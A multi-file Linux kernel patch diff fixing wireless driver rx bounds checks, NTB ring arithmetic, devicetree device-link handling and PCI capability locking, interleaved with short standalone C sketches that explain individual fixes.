+diff --git a/drivers/net/wireless/marvell/mwifiex/sta_rx.c b/drivers/net/wireless/marvell/mwifiex/sta_rx.c
+index 13659b02ba882..65420ad674167 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sta_rx.c
++++ b/drivers/net/wireless/marvell/mwifiex/sta_rx.c
+@@ -86,6 +86,15 @@ int mwifiex_process_rx_packet(struct mwifiex_private *priv,
+ 	rx_pkt_len = le16_to_cpu(local_rx_pd->rx_pkt_length);
+ 	rx_pkt_hdr = (void *)local_rx_pd + rx_pkt_off;
+ 
++	if (sizeof(*rx_pkt_hdr) + rx_pkt_off > skb->len) {
++		mwifiex_dbg(priv->adapter, ERROR,
++			    "wrong rx packet offset: len=%d, rx_pkt_off=%d\n",
++			    skb->len, rx_pkt_off);
++		priv->stats.rx_dropped++;
++		dev_kfree_skb_any(skb);
++		return -1;
++	}
++
+ 	if ((!memcmp(&rx_pkt_hdr->rfc1042_hdr, bridge_tunnel_header,
+ 		     sizeof(bridge_tunnel_header))) ||
+ 	    (!memcmp(&rx_pkt_hdr->rfc1042_hdr, rfc1042_header,
+@@ -194,7 +203,8 @@ int mwifiex_process_sta_rx_packet(struct mwifiex_private *priv,
+ 
+ 	rx_pkt_hdr = (void *)local_rx_pd + rx_pkt_offset;
+ 
+-	if ((rx_pkt_offset + rx_pkt_length) > (u16) skb->len) {
++	if ((rx_pkt_offset + rx_pkt_length) > skb->len ||
++	    sizeof(rx_pkt_hdr->eth803_hdr) + rx_pkt_offset > skb->len) {
+ 		mwifiex_dbg(adapter, ERROR,
+ 			    "wrong rx packet: len=%d, rx_pkt_offset=%d, rx_pkt_length=%d\n",
+ 			    skb->len, rx_pkt_offset, rx_pkt_length);
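
The mwifiex rx hunks above all add the same shape of check: validate that the advertised header offset plus the header size still fits inside the received buffer before dereferencing anything at that offset. A standalone sketch of the bounds test (header type illustrative):

#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdint.h>

struct eth_hdr { uint8_t dst[6], src[6]; uint16_t proto; };

static bool rx_hdr_in_bounds(size_t pkt_len, size_t pkt_off)
{
	/* ordered to avoid unsigned underflow when pkt_off > pkt_len */
	return pkt_off <= pkt_len &&
	       pkt_len - pkt_off >= sizeof(struct eth_hdr);
}

int main(void)
{
	printf("%d\n", rx_hdr_in_bounds(1500, 64));	/* 1: safe to parse */
	printf("%d\n", rx_hdr_in_bounds(60, 58));	/* 0: would overrun */
	return 0;
}
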
+diff --git a/drivers/net/wireless/marvell/mwifiex/uap_txrx.c b/drivers/net/wireless/marvell/mwifiex/uap_txrx.c
+index e495f7eaea033..b8b9a0fcb19cd 100644
+--- a/drivers/net/wireless/marvell/mwifiex/uap_txrx.c
++++ b/drivers/net/wireless/marvell/mwifiex/uap_txrx.c
+@@ -103,6 +103,16 @@ static void mwifiex_uap_queue_bridged_pkt(struct mwifiex_private *priv,
+ 		return;
+ 	}
+ 
++	if (sizeof(*rx_pkt_hdr) +
++	    le16_to_cpu(uap_rx_pd->rx_pkt_offset) > skb->len) {
++		mwifiex_dbg(adapter, ERROR,
++			    "wrong rx packet offset: len=%d,rx_pkt_offset=%d\n",
++			    skb->len, le16_to_cpu(uap_rx_pd->rx_pkt_offset));
++		priv->stats.rx_dropped++;
++		dev_kfree_skb_any(skb);
++		return;
++	}
++
+ 	if ((!memcmp(&rx_pkt_hdr->rfc1042_hdr, bridge_tunnel_header,
+ 		     sizeof(bridge_tunnel_header))) ||
+ 	    (!memcmp(&rx_pkt_hdr->rfc1042_hdr, rfc1042_header,
+@@ -243,7 +253,15 @@ int mwifiex_handle_uap_rx_forward(struct mwifiex_private *priv,
+ 
+ 	if (is_multicast_ether_addr(ra)) {
+ 		skb_uap = skb_copy(skb, GFP_ATOMIC);
+-		mwifiex_uap_queue_bridged_pkt(priv, skb_uap);
++		if (likely(skb_uap)) {
++			mwifiex_uap_queue_bridged_pkt(priv, skb_uap);
++		} else {
++			mwifiex_dbg(adapter, ERROR,
++				    "failed to copy skb for uAP\n");
++			priv->stats.rx_dropped++;
++			dev_kfree_skb_any(skb);
++			return -1;
++		}
+ 	} else {
+ 		if (mwifiex_get_sta_entry(priv, ra)) {
+ 			/* Requeue Intra-BSS packet */
+@@ -367,6 +385,16 @@ int mwifiex_process_uap_rx_packet(struct mwifiex_private *priv,
+ 	rx_pkt_type = le16_to_cpu(uap_rx_pd->rx_pkt_type);
+ 	rx_pkt_hdr = (void *)uap_rx_pd + le16_to_cpu(uap_rx_pd->rx_pkt_offset);
+ 
++	if (le16_to_cpu(uap_rx_pd->rx_pkt_offset) +
++	    sizeof(rx_pkt_hdr->eth803_hdr) > skb->len) {
++		mwifiex_dbg(adapter, ERROR,
++			    "wrong rx packet for struct ethhdr: len=%d, offset=%d\n",
++			    skb->len, le16_to_cpu(uap_rx_pd->rx_pkt_offset));
++		priv->stats.rx_dropped++;
++		dev_kfree_skb_any(skb);
++		return 0;
++	}
++
+ 	ether_addr_copy(ta, rx_pkt_hdr->eth803_hdr.h_source);
+ 
+ 	if ((le16_to_cpu(uap_rx_pd->rx_pkt_offset) +
+diff --git a/drivers/net/wireless/marvell/mwifiex/util.c b/drivers/net/wireless/marvell/mwifiex/util.c
+index 94c2d219835da..745b1d925b217 100644
+--- a/drivers/net/wireless/marvell/mwifiex/util.c
++++ b/drivers/net/wireless/marvell/mwifiex/util.c
+@@ -393,11 +393,15 @@ mwifiex_process_mgmt_packet(struct mwifiex_private *priv,
+ 	}
+ 
+ 	rx_pd = (struct rxpd *)skb->data;
++	pkt_len = le16_to_cpu(rx_pd->rx_pkt_length);
++	if (pkt_len < sizeof(struct ieee80211_hdr) + sizeof(pkt_len)) {
++		mwifiex_dbg(priv->adapter, ERROR, "invalid rx_pkt_length");
++		return -1;
++	}
+ 
+ 	skb_pull(skb, le16_to_cpu(rx_pd->rx_pkt_offset));
+ 	skb_pull(skb, sizeof(pkt_len));
+-
+-	pkt_len = le16_to_cpu(rx_pd->rx_pkt_length);
++	pkt_len -= sizeof(pkt_len);
+ 
+ 	ieee_hdr = (void *)skb->data;
+ 	if (ieee80211_is_mgmt(ieee_hdr->frame_control)) {
+@@ -410,7 +414,7 @@ mwifiex_process_mgmt_packet(struct mwifiex_private *priv,
+ 		skb->data + sizeof(struct ieee80211_hdr),
+ 		pkt_len - sizeof(struct ieee80211_hdr));
+ 
+-	pkt_len -= ETH_ALEN + sizeof(pkt_len);
++	pkt_len -= ETH_ALEN;
+ 	rx_pd->rx_pkt_length = cpu_to_le16(pkt_len);
+ 
+ 	cfg80211_rx_mgmt(&priv->wdev, priv->roc_cfg.chan.center_freq,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/main.c b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+index bda26bd62412e..3280843ea8566 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+@@ -455,7 +455,8 @@ static int mt7915_config(struct ieee80211_hw *hw, u32 changed)
+ 		ieee80211_wake_queues(hw);
+ 	}
+ 
+-	if (changed & IEEE80211_CONF_CHANGE_POWER) {
++	if (changed & (IEEE80211_CONF_CHANGE_POWER |
++		       IEEE80211_CONF_CHANGE_CHANNEL)) {
+ 		ret = mt7915_mcu_set_txpower_sku(phy);
+ 		if (ret)
+ 			return ret;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/init.c b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+index 4ad66b3443838..c997b8d3ea590 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/init.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+@@ -80,7 +80,8 @@ mt7921_init_wiphy(struct ieee80211_hw *hw)
+ 	wiphy->max_sched_scan_ssids = MT76_CONNAC_MAX_SCHED_SCAN_SSID;
+ 	wiphy->max_match_sets = MT76_CONNAC_MAX_SCAN_MATCH;
+ 	wiphy->max_sched_scan_reqs = 1;
+-	wiphy->flags |= WIPHY_FLAG_HAS_CHANNEL_SWITCH;
++	wiphy->flags |= WIPHY_FLAG_HAS_CHANNEL_SWITCH |
++			WIPHY_FLAG_SPLIT_SCAN_6GHZ;
+ 	wiphy->reg_notifier = mt7921_regd_notifier;
+ 
+ 	wiphy->features |= NL80211_FEATURE_SCHED_SCAN_RANDOM_MAC_ADDR |
+diff --git a/drivers/net/wireless/mediatek/mt76/testmode.c b/drivers/net/wireless/mediatek/mt76/testmode.c
+index 0accc71a91c9a..4644dace9bb34 100644
+--- a/drivers/net/wireless/mediatek/mt76/testmode.c
++++ b/drivers/net/wireless/mediatek/mt76/testmode.c
+@@ -8,6 +8,7 @@ const struct nla_policy mt76_tm_policy[NUM_MT76_TM_ATTRS] = {
+ 	[MT76_TM_ATTR_RESET] = { .type = NLA_FLAG },
+ 	[MT76_TM_ATTR_STATE] = { .type = NLA_U8 },
+ 	[MT76_TM_ATTR_TX_COUNT] = { .type = NLA_U32 },
++	[MT76_TM_ATTR_TX_LENGTH] = { .type = NLA_U32 },
+ 	[MT76_TM_ATTR_TX_RATE_MODE] = { .type = NLA_U8 },
+ 	[MT76_TM_ATTR_TX_RATE_NSS] = { .type = NLA_U8 },
+ 	[MT76_TM_ATTR_TX_RATE_IDX] = { .type = NLA_U8 },
+diff --git a/drivers/net/wireless/realtek/rtw89/debug.c b/drivers/net/wireless/realtek/rtw89/debug.c
+index ec0af903961f0..3a8fe60d0bb7b 100644
+--- a/drivers/net/wireless/realtek/rtw89/debug.c
++++ b/drivers/net/wireless/realtek/rtw89/debug.c
+@@ -2302,12 +2302,14 @@ static ssize_t rtw89_debug_priv_btc_manual_set(struct file *filp,
+ 	struct rtw89_dev *rtwdev = debugfs_priv->rtwdev;
+ 	struct rtw89_btc *btc = &rtwdev->btc;
+ 	bool btc_manual;
++	int ret;
+ 
+-	if (kstrtobool_from_user(user_buf, count, &btc_manual))
+-		goto out;
++	ret = kstrtobool_from_user(user_buf, count, &btc_manual);
++	if (ret)
++		return ret;
+ 
+ 	btc->ctrl.manual = btc_manual;
+-out:
++
+ 	return count;
+ }
+ 
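
The rtw89 debugfs fix above returns the kstrtobool_from_user() error instead of swallowing it and reporting success. A standalone sketch of propagating a parse failure, with strtol standing in for the kernel helper:

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

static long parse_bool(const char *buf, int *val)
{
	char *end;
	long v;

	errno = 0;
	v = strtol(buf, &end, 10);
	if (errno || end == buf || (v != 0 && v != 1))
		return -EINVAL;
	*val = (int)v;
	return 0;
}

int main(void)
{
	int manual;
	long ret;

	ret = parse_bool("x", &manual);
	if (ret)	/* the old code fell through and returned success */
		fprintf(stderr, "parse failed: %ld\n", ret);
	return 0;
}
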
+diff --git a/drivers/ntb/ntb_transport.c b/drivers/ntb/ntb_transport.c
+index 2abd2235bbcab..9532108d2dce1 100644
+--- a/drivers/ntb/ntb_transport.c
++++ b/drivers/ntb/ntb_transport.c
+@@ -909,7 +909,7 @@ static int ntb_set_mw(struct ntb_transport_ctx *nt, int num_mw,
+ 	return 0;
+ }
+ 
+-static void ntb_qp_link_down_reset(struct ntb_transport_qp *qp)
++static void ntb_qp_link_context_reset(struct ntb_transport_qp *qp)
+ {
+ 	qp->link_is_up = false;
+ 	qp->active = false;
+@@ -932,6 +932,13 @@ static void ntb_qp_link_down_reset(struct ntb_transport_qp *qp)
+ 	qp->tx_async = 0;
+ }
+ 
++static void ntb_qp_link_down_reset(struct ntb_transport_qp *qp)
++{
++	ntb_qp_link_context_reset(qp);
++	if (qp->remote_rx_info)
++		qp->remote_rx_info->entry = qp->rx_max_entry - 1;
++}
++
+ static void ntb_qp_link_cleanup(struct ntb_transport_qp *qp)
+ {
+ 	struct ntb_transport_ctx *nt = qp->transport;
+@@ -1174,7 +1181,7 @@ static int ntb_transport_init_queue(struct ntb_transport_ctx *nt,
+ 	qp->ndev = nt->ndev;
+ 	qp->client_ready = false;
+ 	qp->event_handler = NULL;
+-	ntb_qp_link_down_reset(qp);
++	ntb_qp_link_context_reset(qp);
+ 
+ 	if (mw_num < qp_count % mw_count)
+ 		num_qps_mw = qp_count / mw_count + 1;
+@@ -2276,9 +2283,13 @@ int ntb_transport_tx_enqueue(struct ntb_transport_qp *qp, void *cb, void *data,
+ 	struct ntb_queue_entry *entry;
+ 	int rc;
+ 
+-	if (!qp || !qp->link_is_up || !len)
++	if (!qp || !len)
+ 		return -EINVAL;
+ 
++	/* If the qp link is down already, just ignore. */
++	if (!qp->link_is_up)
++		return 0;
++
+ 	entry = ntb_list_rm(&qp->ntb_tx_free_q_lock, &qp->tx_free_q);
+ 	if (!entry) {
+ 		qp->tx_err_no_buf++;
+@@ -2418,7 +2429,7 @@ unsigned int ntb_transport_tx_free_entry(struct ntb_transport_qp *qp)
+ 	unsigned int head = qp->tx_index;
+ 	unsigned int tail = qp->remote_rx_info->entry;
+ 
+-	return tail > head ? tail - head : qp->tx_max_entry + tail - head;
++	return tail >= head ? tail - head : qp->tx_max_entry + tail - head;
+ }
+ EXPORT_SYMBOL_GPL(ntb_transport_tx_free_entry);
+ 
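
The one-character ntb_transport_tx_free_entry() fix above matters at the boundary: when head catches up to tail the ring is full, so the comparison must be tail >= head (yielding 0); the old strict '>' fell through to the wrap-around branch and reported a full ring as completely free. A standalone sketch of the arithmetic:

#include <stdio.h>

static unsigned int tx_free_entries(unsigned int head, unsigned int tail,
				    unsigned int max)
{
	return tail >= head ? tail - head : max + tail - head;
}

int main(void)
{
	unsigned int max = 64;

	printf("full:    %u\n", tx_free_entries(5, 5, max));	/* 0, was 64 */
	printf("wrapped: %u\n", tx_free_entries(60, 4, max));	/* 8 */
	return 0;
}
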
+diff --git a/drivers/nvdimm/nd_perf.c b/drivers/nvdimm/nd_perf.c
+index 433bbb68ae641..2b6dc80d8fb5b 100644
+--- a/drivers/nvdimm/nd_perf.c
++++ b/drivers/nvdimm/nd_perf.c
+@@ -308,8 +308,8 @@ int register_nvdimm_pmu(struct nvdimm_pmu *nd_pmu, struct platform_device *pdev)
+ 
+ 	rc = perf_pmu_register(&nd_pmu->pmu, nd_pmu->pmu.name, -1);
+ 	if (rc) {
+-		kfree(nd_pmu->pmu.attr_groups);
+ 		nvdimm_pmu_free_hotplug_memory(nd_pmu);
++		kfree(nd_pmu->pmu.attr_groups);
+ 		return rc;
+ 	}
+ 
+@@ -324,6 +324,7 @@ void unregister_nvdimm_pmu(struct nvdimm_pmu *nd_pmu)
+ {
+ 	perf_pmu_unregister(&nd_pmu->pmu);
+ 	nvdimm_pmu_free_hotplug_memory(nd_pmu);
++	kfree(nd_pmu->pmu.attr_groups);
+ 	kfree(nd_pmu);
+ }
+ EXPORT_SYMBOL_GPL(unregister_nvdimm_pmu);
+diff --git a/drivers/of/dynamic.c b/drivers/of/dynamic.c
+index 4e436f2d13aeb..95501b77ef314 100644
+--- a/drivers/of/dynamic.c
++++ b/drivers/of/dynamic.c
+@@ -225,6 +225,7 @@ static void __of_attach_node(struct device_node *np)
+ 	np->sibling = np->parent->child;
+ 	np->parent->child = np;
+ 	of_node_clear_flag(np, OF_DETACHED);
++	np->fwnode.flags |= FWNODE_FLAG_NOT_DEVICE;
+ }
+ 
+ /**
+diff --git a/drivers/of/overlay.c b/drivers/of/overlay.c
+index 5289975bad708..4402871b5c0c0 100644
+--- a/drivers/of/overlay.c
++++ b/drivers/of/overlay.c
+@@ -752,8 +752,6 @@ static int init_overlay_changeset(struct overlay_changeset *ovcs)
+ 	if (!of_node_is_root(ovcs->overlay_root))
+ 		pr_debug("%s() ovcs->overlay_root is not root\n", __func__);
+ 
+-	of_changeset_init(&ovcs->cset);
+-
+ 	cnt = 0;
+ 
+ 	/* fragment nodes */
+@@ -1013,6 +1011,7 @@ int of_overlay_fdt_apply(const void *overlay_fdt, u32 overlay_fdt_size,
+ 
+ 	INIT_LIST_HEAD(&ovcs->ovcs_list);
+ 	list_add_tail(&ovcs->ovcs_list, &ovcs_list);
++	of_changeset_init(&ovcs->cset);
+ 
+ 	/*
+ 	 * Must create permanent copy of FDT because of_fdt_unflatten_tree()
+diff --git a/drivers/of/platform.c b/drivers/of/platform.c
+index e181c3f50f1da..bf96862cb7003 100644
+--- a/drivers/of/platform.c
++++ b/drivers/of/platform.c
+@@ -741,6 +741,11 @@ static int of_platform_notify(struct notifier_block *nb,
+ 		if (of_node_check_flag(rd->dn, OF_POPULATED))
+ 			return NOTIFY_OK;
+ 
++		/*
++		 * Clear the flag before adding the device so that fw_devlink
++		 * doesn't skip adding consumers to this device.
++		 */
++		rd->dn->fwnode.flags &= ~FWNODE_FLAG_NOT_DEVICE;
+ 		/* pdev_parent may be NULL when no bus platform device */
+ 		pdev_parent = of_find_device_by_node(rd->dn->parent);
+ 		pdev = of_platform_device_create(rd->dn, NULL,
+diff --git a/drivers/of/property.c b/drivers/of/property.c
+index 134cfc980b70b..b636777e6f7c8 100644
+--- a/drivers/of/property.c
++++ b/drivers/of/property.c
+@@ -1062,20 +1062,6 @@ of_fwnode_device_get_match_data(const struct fwnode_handle *fwnode,
+ 	return of_device_get_match_data(dev);
+ }
+ 
+-static bool of_is_ancestor_of(struct device_node *test_ancestor,
+-			      struct device_node *child)
+-{
+-	of_node_get(child);
+-	while (child) {
+-		if (child == test_ancestor) {
+-			of_node_put(child);
+-			return true;
+-		}
+-		child = of_get_next_parent(child);
+-	}
+-	return false;
+-}
+-
+ static struct device_node *of_get_compat_node(struct device_node *np)
+ {
+ 	of_node_get(np);
+@@ -1106,71 +1092,27 @@ static struct device_node *of_get_compat_node_parent(struct device_node *np)
+ 	return node;
+ }
+ 
+-/**
+- * of_link_to_phandle - Add fwnode link to supplier from supplier phandle
+- * @con_np: consumer device tree node
+- * @sup_np: supplier device tree node
+- *
+- * Given a phandle to a supplier device tree node (@sup_np), this function
+- * finds the device that owns the supplier device tree node and creates a
+- * device link from @dev consumer device to the supplier device. This function
+- * doesn't create device links for invalid scenarios such as trying to create a
+- * link with a parent device as the consumer of its child device. In such
+- * cases, it returns an error.
+- *
+- * Returns:
+- * - 0 if fwnode link successfully created to supplier
+- * - -EINVAL if the supplier link is invalid and should not be created
+- * - -ENODEV if struct device will never be create for supplier
+- */
+-static int of_link_to_phandle(struct device_node *con_np,
++static void of_link_to_phandle(struct device_node *con_np,
+ 			      struct device_node *sup_np)
+ {
+-	struct device *sup_dev;
+-	struct device_node *tmp_np = sup_np;
++	struct device_node *tmp_np = of_node_get(sup_np);
+ 
+-	/*
+-	 * Find the device node that contains the supplier phandle.  It may be
+-	 * @sup_np or it may be an ancestor of @sup_np.
+-	 */
+-	sup_np = of_get_compat_node(sup_np);
+-	if (!sup_np) {
+-		pr_debug("Not linking %pOFP to %pOFP - No device\n",
+-			 con_np, tmp_np);
+-		return -ENODEV;
+-	}
++	/* Check that sup_np and its ancestors are available. */
++	while (tmp_np) {
++		if (of_fwnode_handle(tmp_np)->dev) {
++			of_node_put(tmp_np);
++			break;
++		}
+ 
+-	/*
+-	 * Don't allow linking a device node as a consumer of one of its
+-	 * descendant nodes. By definition, a child node can't be a functional
+-	 * dependency for the parent node.
+-	 */
+-	if (of_is_ancestor_of(con_np, sup_np)) {
+-		pr_debug("Not linking %pOFP to %pOFP - is descendant\n",
+-			 con_np, sup_np);
+-		of_node_put(sup_np);
+-		return -EINVAL;
+-	}
++		if (!of_device_is_available(tmp_np)) {
++			of_node_put(tmp_np);
++			return;
++		}
+ 
+-	/*
+-	 * Don't create links to "early devices" that won't have struct devices
+-	 * created for them.
+-	 */
+-	sup_dev = get_dev_from_fwnode(&sup_np->fwnode);
+-	if (!sup_dev &&
+-	    (of_node_check_flag(sup_np, OF_POPULATED) ||
+-	     sup_np->fwnode.flags & FWNODE_FLAG_NOT_DEVICE)) {
+-		pr_debug("Not linking %pOFP to %pOFP - No struct device\n",
+-			 con_np, sup_np);
+-		of_node_put(sup_np);
+-		return -ENODEV;
++		tmp_np = of_get_next_parent(tmp_np);
+ 	}
+-	put_device(sup_dev);
+ 
+ 	fwnode_link_add(of_fwnode_handle(con_np), of_fwnode_handle(sup_np));
+-	of_node_put(sup_np);
+-
+-	return 0;
+ }
+ 
+ /**
+@@ -1324,6 +1266,7 @@ DEFINE_SIMPLE_PROP(pwms, "pwms", "#pwm-cells")
+ DEFINE_SIMPLE_PROP(resets, "resets", "#reset-cells")
+ DEFINE_SIMPLE_PROP(leds, "leds", NULL)
+ DEFINE_SIMPLE_PROP(backlight, "backlight", NULL)
++DEFINE_SIMPLE_PROP(panel, "panel", NULL)
+ DEFINE_SUFFIX_PROP(regulators, "-supply", NULL)
+ DEFINE_SUFFIX_PROP(gpio, "-gpio", "#gpio-cells")
+ 
+@@ -1412,6 +1355,7 @@ static const struct supplier_bindings of_supplier_bindings[] = {
+ 	{ .parse_prop = parse_resets, },
+ 	{ .parse_prop = parse_leds, },
+ 	{ .parse_prop = parse_backlight, },
++	{ .parse_prop = parse_panel, },
+ 	{ .parse_prop = parse_gpio_compat, },
+ 	{ .parse_prop = parse_interrupts, },
+ 	{ .parse_prop = parse_regulators, },
+diff --git a/drivers/of/unittest.c b/drivers/of/unittest.c
+index 9be6ed47a1ce4..edd2342598e49 100644
+--- a/drivers/of/unittest.c
++++ b/drivers/of/unittest.c
+@@ -70,7 +70,7 @@ static void __init of_unittest_find_node_by_name(void)
+ 
+ 	np = of_find_node_by_path("/testcase-data");
+ 	name = kasprintf(GFP_KERNEL, "%pOF", np);
+-	unittest(np && !strcmp("/testcase-data", name),
++	unittest(np && name && !strcmp("/testcase-data", name),
+ 		"find /testcase-data failed\n");
+ 	of_node_put(np);
+ 	kfree(name);
+@@ -81,14 +81,14 @@ static void __init of_unittest_find_node_by_name(void)
+ 
+ 	np = of_find_node_by_path("/testcase-data/phandle-tests/consumer-a");
+ 	name = kasprintf(GFP_KERNEL, "%pOF", np);
+-	unittest(np && !strcmp("/testcase-data/phandle-tests/consumer-a", name),
++	unittest(np && name && !strcmp("/testcase-data/phandle-tests/consumer-a", name),
+ 		"find /testcase-data/phandle-tests/consumer-a failed\n");
+ 	of_node_put(np);
+ 	kfree(name);
+ 
+ 	np = of_find_node_by_path("testcase-alias");
+ 	name = kasprintf(GFP_KERNEL, "%pOF", np);
+-	unittest(np && !strcmp("/testcase-data", name),
++	unittest(np && name && !strcmp("/testcase-data", name),
+ 		"find testcase-alias failed\n");
+ 	of_node_put(np);
+ 	kfree(name);
+@@ -99,7 +99,7 @@ static void __init of_unittest_find_node_by_name(void)
+ 
+ 	np = of_find_node_by_path("testcase-alias/phandle-tests/consumer-a");
+ 	name = kasprintf(GFP_KERNEL, "%pOF", np);
+-	unittest(np && !strcmp("/testcase-data/phandle-tests/consumer-a", name),
++	unittest(np && name && !strcmp("/testcase-data/phandle-tests/consumer-a", name),
+ 		"find testcase-alias/phandle-tests/consumer-a failed\n");
+ 	of_node_put(np);
+ 	kfree(name);
+@@ -1379,6 +1379,8 @@ static void attach_node_and_children(struct device_node *np)
+ 	const char *full_name;
+ 
+ 	full_name = kasprintf(GFP_KERNEL, "%pOF", np);
++	if (!full_name)
++		return;
+ 
+ 	if (!strcmp(full_name, "/__local_fixups__") ||
+ 	    !strcmp(full_name, "/__fixups__")) {
+@@ -2060,7 +2062,7 @@ static int __init of_unittest_apply_revert_overlay_check(int overlay_nr,
+ 	of_unittest_untrack_overlay(save_ovcs_id);
+ 
+ 	/* unittest device must be again in before state */
+-	if (of_unittest_device_exists(unittest_nr, PDEV_OVERLAY) != before) {
++	if (of_unittest_device_exists(unittest_nr, ovtype) != before) {
+ 		unittest(0, "%s with device @\"%s\" %s\n",
+ 				overlay_name_from_nr(overlay_nr),
+ 				unittest_path(unittest_nr, ovtype),
+diff --git a/drivers/opp/core.c b/drivers/opp/core.c
+index d707214069ca9..f0d70ecc0271b 100644
+--- a/drivers/opp/core.c
++++ b/drivers/opp/core.c
+@@ -2372,7 +2372,7 @@ static int _opp_attach_genpd(struct opp_table *opp_table, struct device *dev,
+ 
+ 		virt_dev = dev_pm_domain_attach_by_name(dev, *name);
+ 		if (IS_ERR_OR_NULL(virt_dev)) {
+-			ret = PTR_ERR(virt_dev) ? : -ENODEV;
++			ret = virt_dev ? PTR_ERR(virt_dev) : -ENODEV;
+ 			dev_err(dev, "Couldn't attach to pm_domain: %d\n", ret);
+ 			goto err;
+ 		}
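
[Illustrative aside, not part of the patch] For context on the drivers/opp hunk: dev_pm_domain_attach_by_name() follows the kernel's pointer-or-error convention, and PTR_ERR(NULL) evaluates to 0, so the rewritten line maps the NULL case to -ENODEV explicitly rather than leaning on the elvis operator. A simplified user-space re-creation of the encoding (ERR_PTR/PTR_ERR/IS_ERR_OR_NULL here are local approximations of the kernel macros):

#include <errno.h>
#include <stdio.h>

#define MAX_ERRNO 4095

static void *ERR_PTR(long error) { return (void *)error; }
static long PTR_ERR(const void *ptr) { return (long)ptr; }
static int IS_ERR_OR_NULL(const void *ptr)
{
    return !ptr || (unsigned long)ptr >= (unsigned long)-MAX_ERRNO;
}

int main(void)
{
    void *err = ERR_PTR(-ENODEV);
    void *nul = NULL;

    if (IS_ERR_OR_NULL(err))
        printf("err:  PTR_ERR = %ld\n", PTR_ERR(err)); /* -19 */
    if (IS_ERR_OR_NULL(nul))
        printf("null: PTR_ERR = %ld\n", PTR_ERR(nul)); /* 0, hence the ternary */

    int ret = nul ? (int)PTR_ERR(nul) : -ENODEV;
    printf("ret = %d\n", ret);                         /* -19 */
    return 0;
}
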
+diff --git a/drivers/pci/access.c b/drivers/pci/access.c
+index 708c7529647fd..3d20f9c51efe7 100644
+--- a/drivers/pci/access.c
++++ b/drivers/pci/access.c
+@@ -491,8 +491,8 @@ int pcie_capability_write_dword(struct pci_dev *dev, int pos, u32 val)
+ }
+ EXPORT_SYMBOL(pcie_capability_write_dword);
+ 
+-int pcie_capability_clear_and_set_word(struct pci_dev *dev, int pos,
+-				       u16 clear, u16 set)
++int pcie_capability_clear_and_set_word_unlocked(struct pci_dev *dev, int pos,
++						u16 clear, u16 set)
+ {
+ 	int ret;
+ 	u16 val;
+@@ -506,7 +506,21 @@ int pcie_capability_clear_and_set_word(struct pci_dev *dev, int pos,
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL(pcie_capability_clear_and_set_word);
++EXPORT_SYMBOL(pcie_capability_clear_and_set_word_unlocked);
++
++int pcie_capability_clear_and_set_word_locked(struct pci_dev *dev, int pos,
++					      u16 clear, u16 set)
++{
++	unsigned long flags;
++	int ret;
++
++	spin_lock_irqsave(&dev->pcie_cap_lock, flags);
++	ret = pcie_capability_clear_and_set_word_unlocked(dev, pos, clear, set);
++	spin_unlock_irqrestore(&dev->pcie_cap_lock, flags);
++
++	return ret;
++}
++EXPORT_SYMBOL(pcie_capability_clear_and_set_word_locked);
+ 
+ int pcie_capability_clear_and_set_dword(struct pci_dev *dev, int pos,
+ 					u32 clear, u32 set)
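
[Illustrative aside, not part of the patch] The access.c hunk splits the capability update into an unlocked primitive plus a locked wrapper serialized by the new per-device pcie_cap_lock, making the read-modify-write of LNKCTL-style registers atomic against concurrent callers. A sketch of the same layering, with a pthread mutex standing in for the spinlock and a plain variable for the config word (build with -pthread):

#include <pthread.h>
#include <stdint.h>
#include <stdio.h>

static pthread_mutex_t cap_lock = PTHREAD_MUTEX_INITIALIZER;
static uint16_t reg;    /* stand-in for a PCIe capability register */

/* Unlocked primitive: caller must guarantee exclusive access. */
static void clear_and_set_word_unlocked(uint16_t clear, uint16_t set)
{
    uint16_t val = reg;   /* read   */
    val &= ~clear;        /* modify */
    val |= set;
    reg = val;            /* write  */
}

/* Locked wrapper: the whole read-modify-write is one critical section. */
static void clear_and_set_word_locked(uint16_t clear, uint16_t set)
{
    pthread_mutex_lock(&cap_lock);
    clear_and_set_word_unlocked(clear, set);
    pthread_mutex_unlock(&cap_lock);
}

int main(void)
{
    reg = 0x00ff;
    clear_and_set_word_locked(0x000f, 0x4000);
    printf("reg = 0x%04x\n", reg);    /* 0x40f0 */
    return 0;
}
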
+diff --git a/drivers/pci/controller/dwc/pcie-qcom-ep.c b/drivers/pci/controller/dwc/pcie-qcom-ep.c
+index 6d0d1b759ca24..d4c566c1c8725 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom-ep.c
++++ b/drivers/pci/controller/dwc/pcie-qcom-ep.c
+@@ -410,7 +410,7 @@ static int qcom_pcie_perst_deassert(struct dw_pcie *pci)
+ 	/* Gate Master AXI clock to MHI bus during L1SS */
+ 	val = readl_relaxed(pcie_ep->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 	val &= ~PARF_MSTR_AXI_CLK_EN;
+-	val = readl_relaxed(pcie_ep->parf + PARF_MHI_CLOCK_RESET_CTRL);
++	writel_relaxed(val, pcie_ep->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 
+ 	dw_pcie_ep_init_notify(&pcie_ep->pci.ep);
+ 
+diff --git a/drivers/pci/controller/dwc/pcie-tegra194.c b/drivers/pci/controller/dwc/pcie-tegra194.c
+index 528e73ccfa43e..2241029537a03 100644
+--- a/drivers/pci/controller/dwc/pcie-tegra194.c
++++ b/drivers/pci/controller/dwc/pcie-tegra194.c
+@@ -879,11 +879,6 @@ static int tegra_pcie_dw_host_init(struct dw_pcie_rp *pp)
+ 		pcie->pcie_cap_base = dw_pcie_find_capability(&pcie->pci,
+ 							      PCI_CAP_ID_EXP);
+ 
+-	val_16 = dw_pcie_readw_dbi(pci, pcie->pcie_cap_base + PCI_EXP_DEVCTL);
+-	val_16 &= ~PCI_EXP_DEVCTL_PAYLOAD;
+-	val_16 |= PCI_EXP_DEVCTL_PAYLOAD_256B;
+-	dw_pcie_writew_dbi(pci, pcie->pcie_cap_base + PCI_EXP_DEVCTL, val_16);
+-
